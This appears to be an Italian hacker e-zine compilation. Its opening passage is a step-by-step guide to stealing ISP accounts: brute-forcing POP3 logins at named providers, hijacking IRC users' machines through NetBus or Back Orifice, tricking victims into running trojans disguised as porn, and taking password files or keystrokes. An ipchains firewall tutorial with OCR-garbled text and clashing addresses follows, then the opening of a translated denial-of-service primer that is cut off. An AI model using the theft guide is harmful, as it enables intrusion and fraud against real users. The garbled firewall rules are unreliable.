anonimi,noi non c' ne potremmo accorgere. Adesso vi spiego xch nel wwwhack abbiamo settato ip:127.0.0.1 port:8088 nel setup dei proxy. Tutto questo xch il programma riconosce il nostro server,con il nostro ip di default,cio 127.0.0.1 usando la porta 8088. Quindi,anche se noi vogliamo usare questo(Multi Proxy) programma x navigare sul web,quando settiamo il proxy,dobbiamo mettere a ip:127.0.0.1 e a port:8088 . Spero che abbiate capito,senn mandatemi una mail dove vi risponder con calma. Allora,prepariamoci all'attaco. Apriamo multi proxy,e minimizziamolo sulla barra di stato. Adesso apriamo il wwwhack.In alto accanto a File , c' il bottone di nome "Acces". Clikkiamoci sopra,e sul men a cascata che ci apparir,clikkiamo su Pop3. Adesso ci compare una schermata dove dovremo mettere vari settaggi. Partiamo dall'alto. Su "host:" mettiamo l'indirizzo di pop3,quindi mail.edisons.it Su "Username" selezioniamo la voce "Use this File" e su clikkando Browse,andiamo a ricercare la nostra word-list di nomi italiani.Premiamo OK e proseguiamo. Su "Password" selezioniamo l'opzione "Always user the same as username" Facendo cos,il brute prover combinazioni con username e passwd uguali.(ad esempio username:xfxfxf password:xfxfxf e cos via) Dopo non ci rimane che deselezionare un'opzione in basso. Dove c' scritto "Skip after finding one password" dobbiamo togliere la virgoletta dentro il quadratino propio accanto alla scritta. Mentre il secondo "Skip to next username after finding the password" lo lasciamo invarito. Adesso premiamo OK,e i 2 programmini cominceranno a lavorare(Multi Proxy e wwwhack). Noteremo che Multi Proxy filtra i comandi che il wwwhack st facendo tramite il brute force,e la risposta del server. Dopo aver aspettato che il il brute termina di provare tutti gli username della word-list, con grande gioia noteremo che abbiamo ottenuto dei bei account interamente a scrocco. Dopo creeiamo un nuovo accaunt di accesso remoto,e al numero di telefono mettiamo 800101818 e a username e password quello che abbiamo ricavato dal brute. Premiamo connetti,aspettiamo che la connessione viene accettata..eeee....BINGO!! Adesso abbiamo un bel account su edisons. Ma se troviamo dei provider(che offrono falt)un p + organizzati? Ad esempio galaflat (www.galactica.it) organizzata un p meglio alivello di sicurezza. Cio,al momento dell'iscirzione dell'account,non ti fanno scegliere l'username,ma soltanto la password. Gli username li gestiscono loro,quindi al momento della registrazione ti affibbiano un username composto dalla parola galaflat e numeri. Ecco un'esempio di username " galaflat.123456 " (senza apici naturalmente). Oltre a questa prevenzione,c' n un'altra,cio non mettono l'username dell'account uguale all'indirizzo di posta.Questo lo fanno scegliere al propetario al momento della registrazione. Quindi,se una mail ciao@galactica.it ,non vuol dire che ciao l'username dell'account. Quindi la tecnica del brute-force sul pop3,qui non pu funzionare. All'ora come facciamo se vogliamo fottere qualche bella pass ad utenti abbonati a queste flat un pochino + organizzate? Semplice,dobbiamo sempre contare sulle persone + disattente. Un luogo pieno di persone che si fanno imbacuccare facilmente? Semplice,le chat su IRC! Allora,entriamo nei canali + affollati e dove c' + traffico di scambio dati.Sicuramente state pensando a quelli porno,e sinceramente avete ragione. X una volta,quei caxxo di script x mirc servono a qualcosa,ad esempio pizza scipt,venom, dynamirc,ecc... Dico questo xch c' un'opzione utile,cio quella dei trojan scan. Facciamo un trojan scan in un canale affollato,e vedrete che trover molti ip infetti da vari trojan.(maggiormente net-bus e back-orfice) Fra la lista degli ip infetti dobbiamo cercare quelli che finiscono con flat.galactica.it . Appena ne trovate uno,prendete la consolle del trojan e collegatevi all'ip infetto. Solitamente chiede una pass,ma ci sono molti bug con cui si pu superare il problema password. Altrimenti dovete voi prendere x il sellino la gente e spedire la patch del trojan inventandogli una caxxata.Ad esempio dicendogli che gli mandate filmati xxx e invece gli rifilate la patch. Ok,adesso che siamo collegati all'ip del tizio,entriamo nella directory c:\windows\ e cerchiamo il file dove vengono archiviate gli account delle connessione se vengono salvate, cio i file .pwl Ma se il tizio non salva le password al momento della connessione?Facile,usiamo un bel keylogger,cio un programma che logga tutto quello che scrive la tastiera,o preferibilmente solo le passwd,riponendole in un file specifico. Usando uno dei 2 metodi riportati qui sopra otterremmo 2 cose: O il file .pwl da crakkare O il file del keylogger con l'accoutn gi crakkato e pronto x l'uso. Se si ottiene il file .pwl ,ci scarichiamo un crakkatore x file .pwl(consiglio Pwlhack)e dopo aver crakkato il tutto otterremmo l'account e anche il numero di tel. con cui collegarsi. Mentre se otteniamo il file del key logger con solo login e passwd,andiamo nel sito www.galaflat.it e cerchiamo tra le info il numero di tel.(800410001) Naturalmente uno comodo di scegliere uno dei 2 metodi. Dopo ci creeiamo un'altra connessione su accesso remoto,mettiamo i dati,e ci colleghiamo. Quindi avremo un'altro account di flat.... Naturalmente ognuno pu usare una sua tecnica x procurarsi il file .pwl,tipo quella dei computer net-biossati. Io ne ho citate 2 facili da applicare,ma naturalmente c' ne sono vari... Ah,c' un'altra cosa importante da dire,cio sulla questione multi utenza delle flat. Non s sinceramente se possibile collegarsi ad un'accoutn con diverse persone(cio + di una),cmq tramite accertamenti e voci arrivatemi,si dice che possono essere multi utente.Se sapete qualcosa a riguardo,scrivetemi x riferirmelo. Adesso vi devo propio lasciare,anche xch ho un po di fame :PpPp Ah,se trovate errori nel testo,riferitemelo x mail o in chat,grazie! Ciao da SPYRO Saluti:mR_bIs0n(Mio fratellone:),AtlaWare,Bakunin(Mio Maestro :),Spawn,BsTHaCk,Anubi, Radion,la Jessica mmm ops ;)ho sbagliato Rad?,Warning,Terror,Gouranga,Blender,Prodigy, Hiloz[83],Memorik,Hedo,e tutti quelli che ho dimenticato di #phreak.it(scusatemi). Poi saluto tutti gli Spippolatori,in particolare il grande Master e Chrome.Infine saluto tutti quelli che mi vogliono bene :) e quelle presunte persone che hanno fottuto i sorgenti di win e di office alla microsoft. Fuck:Un Fanculo a tutti quelli che mi vogliono male e mi mettono i bastoni far le ruote.Un grande FUCK alla SCUOLA che dopo appena 2 mesi di apertura,mi ha gi rotto il caXXo!,ai PEDOFILI di merda e al Grande Fratello che mi st tanto sul culo!!!! Mail:spyro2600@yahoo.it Irc: #phreak.it #hack.it Url Sito: Http://www.spyrohack.com -+--+ -+--+ INSTALLAZIONE DI UN FIREWALL Il firewall ,quasi certamente , lo strumento di sicurezza informatica che gode di fama maggiore tra le masse.Un altro primato del firewall quello di essere ,in assoluto,uno degli strumenti che danno una forte "sensazione di sicurezza",spesso non giustificata.Per la logica comune ,se un host ha problemi di sicurezza,installando un firewall si risolve tutto:nulla di piu' falso.Esistono piu' tipi di firewall,ma tutti,a prescindere dal tipo,dalla marca e dalla configurazione non sono altro che dei filtri.Spesso i firewalls sono classificati in due tipi:i proxy ed i packet filtering.Quello che differenzia queste due tipologie di firewalls il livello a cui filtrano:i firewalls proxy filtrano a livello dell'applicazione mentre i packet filtering filtrano a livello di trasporto e di rete.I packet filtering sono in assoluto i piu diffusi ,poich anche se forniscono una protezione minore,sono estremamente piu'flessibili.L'altra motivazione che ha decretato il poco successo dei firewalls proxy il fatto che la tendenza moderna della sicurezzqa informatica quella di affidare il compito di "filtrare" il livello applicativo all'applicazione stessa.Per tutte queste ragioni questo testo tratta dei packet filtering.Per arricchire la teoria con qualche applicazione saranno presentati degli esempi utilizzando "ipchains" e dunque il firewallin del kernel 2.2.x del sistema operativo Linux. -+-+IL CONCETTO DI REGOLA-+-+ Il firewall un filtro e quindi ,per poterlo utilizzare bene , necessario conoscere perfettamente quello che si intende filtrare.Questa scelta fondamentale e determina l'efficacia del firewall.Nel caso dei firewall proxy ad essere filtrati sono i pacchetti in entrata e quelli in uscita.Un buon firewall ci d la possibilita' di decidere la sorte dei pacchetti in base alle seguenti caratteristiche: Protocollo IP: -indirizzo sorgente -indirizzo di destinazione -opzioni IP(non sempre purtroppo) -protocollo -frammentazione(bit more fragment settato? Protocollo ICMP: -tipo ICMP -codice ICMP Protocollo UDP/TCP: -porta sorgente -porta destinazione -flags:SYN.ACK ecc. (solo TCP) Alcuni firewalls,come ad esempio ipfilter (probabilmente il migliore in assoluto), permettono di filtrare i pacchetti in relazione a tutti i campi dei protocolli supportati ,anche in base allo " stato" delle connessioni.Anche se ipchains non raggiunge questo livellodi dettaglio,costituisce un ottimo passo in avanti nei confronti del vecchio ipfwadm (in effetti ipchains ed ipfwadm sono i nomi dei programmi utilizzati per settare le regole.Parlando di "ipchains" si fa riferimento al firewalling del kernel 2.2,mentre "ipfwadm" indica il firewaling del kernel 2.0)La configurazione di un firewall non altro che la definizione delle "regole" che determineranno la sorte del pachetto.Eccovi un esempio di regola: Blocca tutti i pacchetti TCP uscenti destinati alla porta 80 dell'host www.microsoft.com Per inserire questa regola con ipchains dovete eseguire il seguente comando (da root): # ipchains -A output -d www.microsoft.com 80 -p TCP -j DENY Dopo l'inserimento di questo comando ,accederete alle pagine web del sito www.microsoft.com diverra'impossibile (la porta 80 TCP proprio la porta sulla quale in "ascolto" il demone httpd) .Bloccando tutti i pacchetti destinati a quella porta,per il vostro host sara'impossibile inoltrare la richiesta necessaria per visionare le loro pagine web.Vediamo meglio il comando appena digitato:l'opzione -A d'ipchains indica di "appendere" la regola alla fine della lista delle regole, output specifica che la regola si riferisce ai soli pacchetti uscenti mentre l'opzione -d indica l'indirizzo di destinazione di questi,in altre parole il campo destinazione del protocollo IP,ed seguito da "80" ,che nel caso del protocollo TCP indica che la porta di destinazione appunto la 80.L'opzione -p indica il protocollo dei pacchetti ,in altre parole il campo "protocol" dell'IP,infine l'opzione -j indica come comportarsi con quel dato pacchetto ,in questo caso l'operazione richiesta "DENY" ,ovvero il pacchetto verra' semplicemente scartato.E' da notare che da quando per destinazione si utilizza il nome di un host (invece che l'indirizzo IP) saranno aggiunte tante regole uguali per tutti gli indirizzi in cui tale nome risolve.Un esempio puo'chiarire meglio il concetto: $ nslookup www.yahoo.com Server: dns.tin.it Address: 194.243.154.62 Non-authoritative answer: Name: www.yahoo.com Address: 204.71.200.67, 204.71.200.68, 204.71.200.75, 204.71.200.74 Com' possibile osservare il nome www.yahoo.com risolve in piu' di un indirizzo IP.E' per questo che digitare il comando: $ ipchains -A output -d www.yahoo.com 80 -p TCP -j DENY Equivale a digitare i seguenti quattro comandi : # ipchains -A output -d 204.71.200.67 -p TCP -j DENY # ipchains -A output -d 204.71.200.68 -p TCP -j DENY # ipchains -A output -d 204.71.200.75 -p TCP -j DENY # ipchains -A output -d 204.71.200.74 -p TCP -j DENY La forma con il nome dell'host preferibile:nel caso gli indirizzi IP di www.yahoo.com venissero modificati la riga di comando necessaria rimarrebbe immutata. Un'alternativa valida puo' essere il seguente comando: # ipchains -A output -d 204.71.200.0/24 80 -p TCP -j DENY Che indica ad ipchains di bloccare qualunque pacchetto diretto verso la porta 80 di tutti gli Indirizzi IP the possiedono almeno i 24 bit plu a sinistra uguali a 204.71.200.0 (ovvero gli indirizzi 204.71.200.0, 204.71.200.1, 204.71.200.255). CEO equivale a dire che saranno bloccati tutti gli accessi verso la porta 80 di quella 'Classe C' (per informazioni suite classi degli indirizzi IP si consiglia la lettura del NET3-HOWTO). -+-+LA RELAZIONE TRA LE REGOLE-+-+ Un concetto molto importante quello della relazione tra le regole. S Supponga un host su Internet, che nasconde una rete locale. Questo host per l'internet un server www, ma per I rete locale anche un server ftp. Noi desideriamo che l'accesso a ftp sia garantito Solo dall'interno ovvero dalla rete locale, mentre dall'esterno dove essere visibile solo ls httpd. Supponiamo che lo scenario sia quel dl figura. Come potete vedere PC1, PC2, PC5 sono i client sulla rete locale. Anche il Server fa parte della rete locale ma ha due interfacce, una con un indirizzo locale e l'altra con un indirizzo pubblico. |-------| | |-------------| | PC1 | | |-------| | | |-------| | | | | ______________ | PC2 |-------------| | | |-------| | | | | | | |-------| | | SERVER | | | | | | | PC3 |------------------ | |--------------- INTERNET |-------| | | FIREWALL | | | | |-------| | | | | | | | | | PC4 |-------------| |_____________| |-------| | | |-------| | | | | | PC5 |-------------| |-------| ammetta che Ia rete locale Sia 1g2,168.L.O e che l'indirizzo pubblico sia 195.120.28.100. Quello che serve e semplice: si desidera che da internet sia accessibile solo II web server e che dalla rete locale sta accessibile anche Il server ftp. Una soluzione potrebbe essere quella di usare le seguenti regole: . accetta tutta i pacchetti entranti provenienti dalla rete locale e diretti verso la porta ftp del server . blocca tutti i pacchetti entranti destinati alla porta ftp del server Ovvero: # ipchains -A input 195.168.2.0/24 -d 195.120.28.110 21 -p TCP -j ACCEPT # ipchains -A input 195.120.28.100 21 -p TCP -j DENY Queste due regole permettono di capire In che modo ipchains (e molti altri firewalls) processa le regole e dunque la relazione n tra le regole stesse. Quando Un pacchetto arriva II firewalling di linux controlla Se questo riguarda la prima regola della lista di regole inserite Nel caso in cui il pacchetto corrispondesse, verrebbe eseguita l'operazione che la regola specifica (nel nostro caso ACCEPT), altrimenti si passerebbe alla regola successiva (questo d l'idea di quanto il firewalling affatichi Ia nostra CPU, in presenza di molte regole e di elevati traffici) e cos via. E per questo che le due regole sopra riportate funzionano. Immaginate un pacchetto TCP proveniente dalla rete locale e destinato alla porta 21 del server. Un tale pacchetto interesser la prima regola, infatti l'indirizzo di provenienza rientra in 192.168.1.0/24 e quello di destinazione proprlo 195.120.28.110, come Ia porta di destinazione appunto la 21, ovvero quella dell'ftp il kernel eseguira' l'operazione descritta dalla prima regola : ACCETT il pacchetto sar accettato e tutte le altre regole Ignorate. D'altra parte un pacchetto to TCP proveniente da un qualunque altro indirizzo di Internet C diretto alta porta 21 del nostro server non soddisfera' Ia prima regola, infatti l'indirizzo sorgente non corrisponder (spoofing permettendo, ma un aftro discorso con 192 168.1.0/24. II confronto proseguir prendendo in esame la seconda regola, che dice dl bloccare qualunque pacchetto destinato alla porta 21 del server. In questo caso il pacchetto ha tutti i requisiti richiesti e l'operazione DENY sar eseguita, cosi il pacchetto verr scartato. Le due regole presentate sopra non sono dl certo le migliori: non danno un grosso margine di sicurezza poich filtrano solo I pacchetti diretti alla porta 21. Ammettendo che per un erro re il servizio telnet non sia stato rimosso dal server, questo continuer ad essere accessibile da parte dl Internet. Un insieme di regole piu' "selettive" il seguente: . accetta I pacchetti TCP entranti provenienti della rete loca le e diretti alla porta 21(ftp) e 20(ftp-data) del server . accetta I pacchetti TCP entranti provenienti da qualunque destinazione diretti alla 80(web) del server I blocca tutti I pacchetti TCP entranti dire W alle porte da 0 a 1024 del server (In modo da proteggere tutti gli eventuali altri servizi che "ascoltano" su una porta privilegiata). Ovvero: # ipchains -A input -s 192.168.2.0/24 -d 195.120.28.100 21 -p TCP -j ACCEPT # ipchains -A input -s 192.168.2.0/24 -d 195.120.28.100 20 -p TCP -j ACCEPT # ipchains -A input -d 195.120.28.100 80 -p TCP -j ACCEPT (ri.b. omettendo -s l'indirizzo sorgente viene impostato a 0/0, dunque 18 regola sar va/Ida per gli ip con Qualunque indirizzo sorgente) Coadiuvando questi brevi esempi con Ia man page di ipchains sarete capaci di sfruttare al massimo le potenzialit del firewalling del kernel 22, ed alla fine riuscirete a filtrare qualunque pacchetto IP, UDP, TCP ed ICMP (limiti di ipchains permettendo). -+-+COSA FILTRARE IN UN CONTESTO REALE-+-+ Imparare ad usare bene un determinato firewall cosi da essere In grado di filtrare In maniera selettiva qualunque tipo di pacchetto non basta (ma una condizione necessaria) per garantire il funzionamento ottimale: serve sapere cosa ti pare. Se pensi al caso specifico di un firewall "orientato" all'host, ovvero the protegge solo ed esclusivamente 'host su cui e installato; II caso semplice poich I firewalls che proteggono Intere reti sono dl pi difficile comprensione e mettano Un articolo a parte. Esistono anche casi molto complessi ed articolati, come le DM2, che saranno trattate in futuro su queste pagine. Come dicevamo l'esempio riguarda H classico host su Internet che fisicamente il computer su cut girano I servizi dl rete ed anche quello su cui gira II firewall stesso. Immaginiamo che su questo ipotetico host siano presenti sol tanto il servizIo di ftp anonimo ed il server dns. La scelta dei demoni importante almeno quanto il firewalling : In questo caso sarebbe consigliabile installare un ftp che permette solo l'accesso anonimo, ne esiste uno molto buono di Marcus j Ranum. Per Il server dns useremo certamente il classico bind. Le nostre regole dovranno permettere l'accesso da parte dl tutta Internet verso la porta 20 e 21 del protocollo TCP e versa a porta 53 del protocollo UDP deII'host. Ipotizzando che il nostro host non abbia altro scopo oltre quello di far girare questi due demoni potremmo pensare alla seguenti regole: La - bloccare in entrata tutti I pacchetti con indirizzo Ip sorgente 127.0.0.0/8 lb - bloccare in entrata tutti I pacchetti con indirizzo Ip sorgente uguale al nostro p. ic - bloccare in entrata tutti I pacchetti con indirizzo Ip sorgente uguale a 192.168.1.0/24 2a - accettare in entrata I pacchetti TCP verso Ia porta 21 2b - accettare in entrata I pacchetti TCP verso Ia porta 20 2c - bloccare in entrata I pacchetti TCP versa le porte da 0 a 1023 2d o bloccare In entrata i pacchetti TCP con il solo flag SYN settato verso le porte da 1024 a 65535 3. - accettare in entrata I pacchetti UDP versa a porta 53 3b . bloccare in entrata i pacchetti UDP verso le porte da 0 a 1023 4. - permettere In entrata I pacchetti ICMP di tipo 3, 4 e 11 4b - bloccare In entrata tutU i pacchetti ICMP 4c - permettere in uscita i pacchetti ICMP di tipo 4 4d - bloccare In uscita tutU i pacchetti ICMP NB. Esaminando queste regole non dimenticate il modo In cui sono processate! Vediamo di capire il perch di queste regole. Le regole la e lb servono a prevenire lo spoofing dei pacchetti: non ce alcun motivo di accettare pacchetti provenienti dall'indirizzo th Ioopb.ck, dal nostro stesso ip a dagli ip della nostra rete locale (se mai ce ne fosse una). Ricordate che le seguenti regole devono essere specificate utilizzando l'opzione -i di ipchains specificando l'Interfaccia con cut siamo connessi ad Internet., infatti, non specificando I'Interfaccia queste regole avrebbero Iteffetto indesiderato dl non permettere le con-nessioni originate da quegli ip neppure nel caso fossero legittime. Le regole 2a e 2b permettono le connessioni verso le porte del servizio ftp, mentre le regole 2c e 2d bloccano rispettivamente ogni tipo di accesso alle porte TCP privilegia te (da 0 a 1023) e inizio di una connessione verso le porte non privilegiate da 1024 a 65535 (SYN flag settato). Una piccola nota, Ia regola 2d costringer ad usare I clients ftp dell'host in passive mode. La regola 3a permette l'accesso al server dns, mentre Ia regola 3b blocca l'accesso a tutte le porte UDP privilegiate. Le regole 4a e 4b si occupano di permettere l'accesso ai soli pacchetti ICMP di tipo destina tlon unreachable, source quench e time exceeded : tran ne rail casi E utile non filtrare questi pacchetti almeno in entrata. Infine le regole 4c e 4d permettono in uscita solo gli ICMP di tipo source quench. Qualcuno potrebbe non essere d'accordo sul l'atto di bloccare il tipo 3 in uscita. In effetti biso gna valutare di volta in volta. Per un host su cui girano solo ftp e dns mi pare una buona scelta, ed un modo efficace per bloccare li scan UDP. -+-+CONCLUSIONE-+-+ Scegliere adeguate regole di firewalling non una cosa semplice perch non un processo sdiematlco. Ogni caso diverso dall'altro e si deve 5cegllere un compromesso tra lies eibilit e sicurezza. Non ci sono regole di firewalling adeguate se chi le implementa non conosce in maniera approfondita il TCP/IP ed i protocolli del servizi the girano sull'host. Net caso di flrewalls che proteggono intere reti le cose sono pi complesse. Solo una attenta valutazione e dei test accurata possono portare ad una configurazione che aumenta redililente la sicurezza globale delta rete protetta. ~. Syn^ sYn^]|[ ---> syn@hackersat.com <---> w w w . h a c k e r s a t . x s 3 . c o m <--- Hans Husman t95hhu@student.tdb.uu.se Ultimo aggiornamento: Luned 28 Ottobre 14:56:31 1996 Tradotto da: Kewl ( kewl@penguin.it ) =================================== =INTRODUZIONE AI DENIAL OF SERVICE= =================================== .0. PREFAZIONE .A. INTRODUZIONE .A.1. COS' UN ATTACCO DENIAL OF SERVICE? .A.2. PERCH QUALCUNO DOVREBBE MANDARE IN CRASH UN SISTEMA? .A.2.1. INTRODUZIONE .A.2.2. STATO SOTTOCULTURALE .A.2.3. PER GUADAGNARE L'ACCESSO .A.2.4. VENDETTA .A.2.5. RAGIONI POLITICHE .A.2.6. RAGIONI ECONOMICHE .A.2.7. CATTIVERIA .A.3. ALCUNI SISTEMI OPERATIVI SONO PI SICURI? .B. ALCUNI OBBIETTIVI DI BASE PER UN ATTACCO .B.1. SPAZIO SWAP .B.2. FREQUENZA .B.3. TAVOLE DEL KERNEL .B.4. RAM .B.5. DISCHI .B.6. CACHE .B.7. INETD .C. ATTACCARE DALL'ESTERNO .C.1. AVERE PROFITTO CON IL FINGER .C.2. UDP E SUNOS 4.1.3. .C.3. BLOCCARE X-WINDOWS .C.4. USO MALIZIOSO DEI SERVIZI UDP .C.5. ATTACCARE CON I CLIENTS LYNX .C.6. USO MALIZIOSO DI telnet .C.7. USO MALIZIOSO DI telnet SU SOLARIS 2.4 .C.8. COME DISABILITARE GLI ACCOUNTS .C.9. LINUX E TCP TIME, DAYTIME .C.10. COME DISABILITARE I SERVIZI .C.11. PARAGON OS BETA R1.4 .C.12. FTP DI NOVELLS NETWARE .C.13. ATTACCHI CON REINDIRIZZAMENTO DI ICMP .C.14. TEMPESTE DI BROADCAST .C.15. EMAIL BOMBING E SPAMMING .C.16. TIME E KERBEROS .C.17. IL BUG DOT DOT .C.18. SUNOS KERNEL PANIC .C.19. APPLESTS OSTILI .C.20. VIRUS .C.21. ABUSO DI FTP ANONIMO .C.22. SYN FLOOD .C.23. PING FLOOD .C.24. MANDARE IN CRASH I SISTEMI CON IL PING DI WINDOWS 95 .C.25. USO MALIZIOSO DEL MESSAGGIO DI RISPOSTA DELLE SUBNET MASK .C.26. FLEXlm .C.27. PARTIRE CON FTP BANALI .D. ATTACCARE DALL'INTERNO .D.1. KERNEL PANIC SOTTO SOLARIS 2.3 .D.2. BLOCCARE IL SERVER X .D.3. RIEMPIRE L'HARD DISK .D.4. USO MALIZIOSO DI eval .D.5. USO MALIZIOSO DI fork() .D.6. CREARE FILES CHE SONO DIFFICILI DA RIMUOVERE .D.7. DIRECTORY NAME LOOKUPCACHE .D.8. ATTACCO CSH .D.9. CREARE FILES IN /tmp .D.10. USARE RESOLV_HOST_CONF .D.11. SUN 4.X E LAVORI NASCOSTI .D.12. MANDARE IN CRASH DG/UX CON ULIMIT .D.13. NETTUNE E HP-UX .D.14. SOLARIS 2.X E NFS .D.15. STABILIT DEL SISTEMA COMPROMESSA CON MOUNT_UNION .D.16. trap_mon CAUSA IL KERNEL PANIC SOTTO SUNOS 4.1.X .E. DUMPING CORE .E.1. BREVE COMMENTO .E.2. USO MALIZIOSO DI NETSCAPE .E.3. CORE DUMPED SOTTO WUFTPD .E.4. ld SOTTO SOLARIS/X86 .F. COME PROTEGGO UN SISTEMA DAGLI ATTACCHI DENIAL OF SERVICE? .F.1. PROTEZIONI DI BASE .F.1.1. INTRODUZIONE .F.1.2. PORT SCANNING .F.1.3. CONTROLLA GLI ATTACCHI DALL'ESTERNO DESCRITTI .F.1.4. CONTROLLA GLI ATTACCHI DALL'INTERNO DESCRITTI .F.1.5. SISTEMI DI MASSIMA SICUREZZA .F.1.6. CONTROLLARE LA SICUREZZA .F.1.7. MANTENERE AGGIORNATO .F.1.8. LEGGERE QUALCOSA DI MEGLIO .F.2. CONTROLLARE LE PRESTAZIONI .F.2.1. INTRODUZIONE .F.2.2. COMANDI E SERVIZI .F.2.3. PROGRAMMI .F.2.4. RESOCONTI .G. LETTURE SUGGERITE .G.1. INFORMAZIONI PER CONOSCENZE PI PROFONDE .G.2. INFORMAZIONI SUGLI AGGIORNAMENTI .G.3. INFORMAZIONI DI BASE .H. COPYRIGHT .I. DISCLAIMER .0. PREFAZIONE ------------ In questo documento ho cercato di rispondere alle seguenti domande: - Cos' un attacco denial of service? - Perch qualcuno dovrebbe mandare in crash un sistema? - Come si manda in crash un sistema? - Come proteggo un sistema da un attacco denial of service? C' anche una sezione chiamata LETTURE SUGGERITE dove puoi trovare suggerimenti su informazioni gratuite che ti potrebbero fornire una conoscenza pi dettagliata su qualcosa. Ricorda che ho un'esperienza limitata con Macintosh, OS/2 e Windows e la maggior parte del materiale quindi per Unix. Puoi trovare sempre le versioni pi aggiornate al seguente indirizzo: http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT [NdT logicamente i testi sono in inglese] Per commenti, suggerimenti e altro a: t95hhu@student.tdb.uu.se .A. INTRODUZIONE ~~~~~~~~~~~~~~~~ .A.1. COS' UN ATTACCO DENIAL OF SERVICE ---------------------------------------- Denial of service quando si mettono fuori uso i servizi, per esempio attraverso il crash dell'intero sistema. Questi tipi di attacchi sono semplici da eseguire ed difficile proteggere un sistema contro di essi. Il problema di base che Unix presume che gli utenti sul sistema o su altri sistemi sanno come comportarsi. .A.2. PERCH QUALCUNO DOVREBBE MANDARE IN CRASH UN SISTEMA? ----------------------------------------------------------- .A.2.1. INTRODUZIONE -------------------- Perch qualcuno dovrebbe mandare in crash un sistema? Ci sono molti motivi e ho presentato essi in maniera pi specifica in una sezione per ogni motivo, ma in sintesi: .1. Introduzione .2. Stato sottoculturale .3. Per guadagnare l'accesso .4. Vendetta .5. Ragioni politiche .6. Ragioni economiche .7. Cattiveria Penso che il primo e il sesto sono i pi comuni oggi, ma che il quarto e il quinto saranno i pi comuni in futuro. .A.2.2. STATO SOTTOCULTURALE ---------------------------- Dopo tutte le informazioni sul syn flood molti di tali attacchi erano eseguiti dalla Svezia. La stragrande maggioranza di questi attacchi non erano una parte di un attacco IP-spoof, erano "solo" un attacco denial of service. Perch? Penso che gli hackers attaccano i sistemi per una pseudo-carriera sottoculturale e penso che molti attacchi denial of service, e qu nell'esempio il syn flood, erano eseguiti per questo motivo. Penso anche che molti hackers cominciano la loro carriera con attacchi denial of service. .A.2.3. PER GUADAGNARE L'ACCESSO -------------------------------- A volte un attacco denial of service potrebbe essere una parte di un attacco per guadagnare l'accesso in un sistema. Al momento posso pensare questo motivo e specificare i metodi: .1. Qualche vecchia versione di x-lock potrebbe essere mandata in crach con un metodo preso dalla famiglia dei denial of service lasciando il sistema aperto. L'accesso fisico era necessario per usare lo spazio di lavoro. .2. Syn flood potrebbe essere una parte di un attacco IP-spoof. .3. Alcuni programmi di sistema potrebbero avere buchi all'avvio, che potrebbero essere usati per avere l'accesso root, per esempio SSH (secure shell). .4. Sotto un attacco potrebbe essere utile mandare in crash altre macchine nella rete o negare ad alcune persone l'abilit di accedere al sistema. .5. Inoltre un sistema potrebbe essere avviato a volte in modo sovvertito, specialmente nei rarp-boots. Se sappiamo quale porta controlla il sistema (69 potrebbe essere un buon indizio) all' avvio possiamo mandare falsi pacchetti e controllare quasi totalmente l'avvio. .A.2.4. VENDETTA ---------------- Un attacco denial of service potrebbe essere una parte di una vendetta contro un utente o un amministratore. .A.2.5. RAGIONI POLITICHE ------------------------- Prima o poi vecchie e nuove organizzazioni capiranno il modo di distruggere computer di sistemi e troveranno strumenti per farlo. Per esempio immagina la Banca A che presta dei soldi alla Compagnia B per costruire una fabbrica che minaccia l'ambiente. L'organizzazione C L'organizzazione C quindi manda in crash il computer di sistema di A, forse con l'aiuto di un impiegato. L'attacco potrebbe costare ad A una grande quantit di denaro se il tempismo giusto. .A.2.6. RAGIONI ECONOMICHE -------------------------- Immagina la piccola compagnia A che si muove in un mercato dominato totalmente dalla compagnia B. I clienti di A e B fanno gli ordini dai computers e dipendono pesantemente sull'orario che stato effettuato (A e B potrebbero essere compagnie di scambio). Se A e B non possono effettuare l'ordine i clienti perdono tempo e cambiano compagnia. Come parte di strategia di mercato A paga un esperto di computer per mandare in crash i computers di B un numero di volte. Un anno dopo A la compagnia dominante. .A.2.7. CATTIVERIA ------------------ Conosco una persona che trova una workstation dove l'utente si dimenticato di uscire. Questa persona si siede e scrive un programma che fa un kill -9 -1 a tempo indeterminato per almeno 30 minuti dopo il tempo di entrata e ha piazzato una chiamata a un programma dal suo file di profilo. Questa cattiveria. .A.3. ALCUNI SISTEMI OPERATIVI SONO PI SICURI? ----------------------------------------------- Questa una domanda difficile a cui difficile rispondere e non penso che sar data qualcosa per confrontare differenti piattaforme Unix. Non puoi dire che un Unix pi sicuro di un altro contro i denial of service, tutto dipende dall'amministratore. Un confronto tra Windows 95 e NT da un lato e Unix e gli altri pu essere comunque interessante. I sistemi Unix sono molto pi complessi e hanno centinaia di programmi integrati, servizi... Questo spesso apre molte vie per mandare in crash il sistema dall'interno. Nella normale rete Windows NT e 95 ci sono pochi modi per mandare in crash il sistema. Comunque ci sono dei metodi che funzionano sempre. Questo ci dice che non c' una grande differenza tra Microsoft e Unix per quanto riguarda gli attacchi dall'interno. Ma ci sono un paio di punti: - Unix ha molti pi strumenti e programmi per scoprire un attacco e controllare gli utenti. Per vedere cosa fa un utente in windows molto difficile. - Gli amministratori medi di Unix probabilmente ha molta pi esperienza degli amministratori medi di Microsoft. Questi due punti ci dicono che Unix pi sicuro contro gli attacchi denial of service dall'interno. Un confronto tra Microsoft e Unix per quanto riguarda gli attacchi dall'esterno molto pi difficile. Comunque vorrei dire che i sistemi medi Microsoft su Internet pi sicuro contro gli attacchi dall'esterno, perch normalmente hanno molti meno servizi. .B. ALCUNI OBIETTIVI DI BASE PER UN ATTACCO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .B.1. SPAZIO SWAP ----------------- La maggior parte dei sistemi hanno molte centinaia di Mbytes di spazio swap per le richieste di servizio dei clients. Lo spazio swap usato tipicamente per una paio di processi che hanno breve vita. Lo spazio swap non sar quasi mai molto usato. Un denial of service potrebbe essere basato su un metodo che cerca di riempire lo spazio swap. .B.2. FREQUENZA ----------- Se la frequenza troppo alta la rete non sar pi utilizzabile. La maggior parte degli attacchi denial of service influenzano la frequenza in alcuni casi. .B.3. TAVOLE DEL KERNEL ----------------------- E' banale traboccare le tavole del kernel che causeranno seri problemi al sistema. I sistemi con cache vuota e piccoli buffers buoti sono particolarmente sensibili. L'allocazione di memoria del kernlel anche un obietivo che sensibile. Il kernel ha un limite di kernelmap, se il sistema supera questo limite non pu essere pi allocata memoria del kernel e si deve riavviare la macchina. La memoria del kernel non usata solo per la RAM, CPU, schermi, e cos via, anche usata per processi ordinari. Questo significa che ogni sistema pu essere mandato in crash e con un cattivo (o 